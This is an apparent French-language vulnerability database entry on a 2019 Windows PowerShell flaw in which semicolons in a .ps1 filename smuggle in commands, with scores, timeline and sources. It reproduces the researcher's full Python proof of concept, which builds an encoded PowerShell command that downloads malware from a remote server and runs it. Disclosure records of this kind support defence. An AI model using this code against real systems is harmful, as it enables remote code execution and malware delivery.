CVSS Score de méta-température | Exploit Prix Actuel (≈) | Score d'intérêt CTI |
---|---|---|
5.7 | $0-$5k | 0.00 |
Une vulnérabilité classée critique a été trouvée dans Microsoft Windows (Operating System). Ceci affecte une fonction inconnue du composant PowerShell. A cause de la manipulation dans le cadre de Semicolon mène à une vulnérabilité de classe elévation de privilèges.
La vulnerabilité a été publié en 01/08/2019 par John Page (hyp3rlinx) avec bulletin (Website) (non défini). La notice d'information est disponible en téléchargement sur hyp3rlinx.altervista.org La publication a été coordonnée avec le fabricant. L'attaque peut être initialisée à distance. Aucune forme d'authentification est requise pour l'exploitation. Les details techniques sont inconnus mais une méthode d'exploitation publique est connue.
Un exploit a été developpé par John Page (hyp3rlinx) et a été publié immédiatement après la notice d'information. L'exploit est disponible au téléchargment sur hyp3rlinx.altervista.org. Il est déclaré comme preuve de concept. Cette vulnérabilité a été classée comme 0-day non publique pendant au moins 12 jours. Le code utilisé par l'exploit est:
from base64 import b64encode import argparse,sys #Windows PowerShell - Unsantized Filename Command Execution Vulnerability PoC #Create ".ps1" files with Embedded commands to download, save and execute malware within a PowerShell Script Filename. #Expects hostname/ip-addr of web-server housing the exploit. #By hyp3rlinx #Apparition Security #==================== def parse_args(): parser.add_argument("-i", "--ipaddress", help="Remote server to download and exec malware from.") parser.add_argument("-m", "--local_malware_name", help="Name for the Malware after downloading.") parser.add_argument("-r", "--remote_malware_name", help="Malwares name on remote server.") return parser.parse_args() def main(args): PSEmbedFilenameMalwr="" if args.ipaddress: PSEmbedFilenameMalwr = "powershell iwr "+args.ipaddress+"/"+args.remote_malware_name+" -O %CD%\\"+args.local_malware_name+" ;sleep -s 2;start "+args.local_malware_name return b64encode(PSEmbedFilenameMalwr.encode('UTF-16LE')) def create_file(payload): f=open("Test;PowerShell -e "+payload+";2.ps1", "w") f.write("Write-Output 'Have a nice day!'") f.close() if __name__=="__main__": parser = argparse.ArgumentParser() PSCmds = main(parse_args()) if len(sys.argv)==1: parser.print_help(sys.stderr) sys.exit(1) create_file(PSCmds) print "PowerShell - Unsantized Filename Command Execution File created!" print "By hyp3rlinx"
La meilleure solution suggérée pour atténuer le problème est Désactiver.
Produit
Taper
Fournisseur
Nom
Licence
CPE 2.3
CPE 2.2
Vidéo
CVSSv4
VulDB Vecteur: 🔍VulDB Fiabilité: 🔍
CVSSv3
VulDB Score méta-base: 6.3VulDB Score de méta-température: 5.7
VulDB Note de base: 6.3
VulDB Note temporaire: 5.7
VulDB Vecteur: 🔍
VulDB Fiabilité: 🔍
CVSSv2
AV | AC | Au | C | I | A |
---|---|---|---|---|---|
💳 | 💳 | 💳 | 💳 | 💳 | 💳 |
💳 | 💳 | 💳 | 💳 | 💳 | 💳 |
💳 | 💳 | 💳 | 💳 | 💳 | 💳 |
Vecteur | Complexité | Authentification | Confidentialité | Intégrité | Disponibilité |
---|---|---|---|---|---|
ouvrir | ouvrir | ouvrir | ouvrir | ouvrir | ouvrir |
ouvrir | ouvrir | ouvrir | ouvrir | ouvrir | ouvrir |
ouvrir | ouvrir | ouvrir | ouvrir | ouvrir | ouvrir |
VulDB Note de base: 🔍
VulDB Note temporaire: 🔍
VulDB Fiabilité: 🔍
Exploiting
Classe: Elévation de privilègesCWE: CWE-94 / CWE-74 / CWE-707
CAPEC: 🔍
ATT&CK: 🔍
Localement: Non
Remote: Oui
Disponibilité: 🔍
Accéder: Publique
Statut: Preuve de concept
Auteur: John Page (hyp3rlinx)
Télécharger: 🔍
Prédiction de prix: 🔍
Estimation actuelle des prix: 🔍
0-Day | ouvrir | ouvrir | ouvrir | ouvrir |
---|---|---|---|---|
Aujourd'hui | ouvrir | ouvrir | ouvrir | ouvrir |
Renseignements sur les menaces
Intérêt: 🔍Acteurs actifs: 🔍
Groupes APT actifs: 🔍
Contre-mesures
Recommandé: DésactiverStatut: 🔍
Heure 0 jour: 🔍
Délai d'exploitation: 🔍
Chronologie
20/07/2019 🔍23/07/2019 🔍
01/08/2019 🔍
01/08/2019 🔍
06/08/2019 🔍
21/07/2020 🔍
Sources
Fournisseur: microsoft.comProduit: microsoft.com
Bulletin: hyp3rlinx.altervista.org
Chercheur: John Page (hyp3rlinx)
Statut: Non défini
Coordonné: 🔍
scip Labs: https://www.scip.ch/en/?labs.20161013
Entrée
Établi: 06/08/2019 07:42Mise à jour: 21/07/2020 11:24
Changements: 06/08/2019 07:42 (53), 21/07/2020 11:24 (2)
Compléter: 🔍
Auteur: hyp3rlinx
Cache ID: 79:2CB:103
Soumettre
Accepté
- Submit #80: Microsoft Windows PowerShell / Unsanitized Filename Command Execution (par hyp3rlinx)
Dupliqué
- Submit #XXXXXX: Xxxxxxx Xxxxxxxxxx / Xxxxxx Xxxx Xxx (xxxxxxxxx) (par hyp3rlinx)
- Submit #XXXXXX: Xxxxxxxxx Xxxxxxxx Xxxx-xxxxxxx Xxxxxxxxxx Xxx * Xxxxxx Xxxx Xxxxxxxxx (par hyp3rlinx)
Aucun commentaire pour l'instant. Langues: fr + en.
Veuillez vous connecter pour commenter.